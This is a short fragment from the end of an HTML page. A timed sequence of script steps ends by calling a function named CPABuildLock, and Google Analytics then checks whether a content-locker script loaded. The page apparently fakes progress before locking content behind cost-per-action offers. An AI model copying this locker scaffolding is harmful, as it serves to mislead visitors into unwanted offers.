                    afterSleep:3500
                },
                {
                    funct:function(){
                        lineBreak();
                        CPABuildLock();
                    },
                    afterSleep:999999999999999
                },
            ];
        }

    });



</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
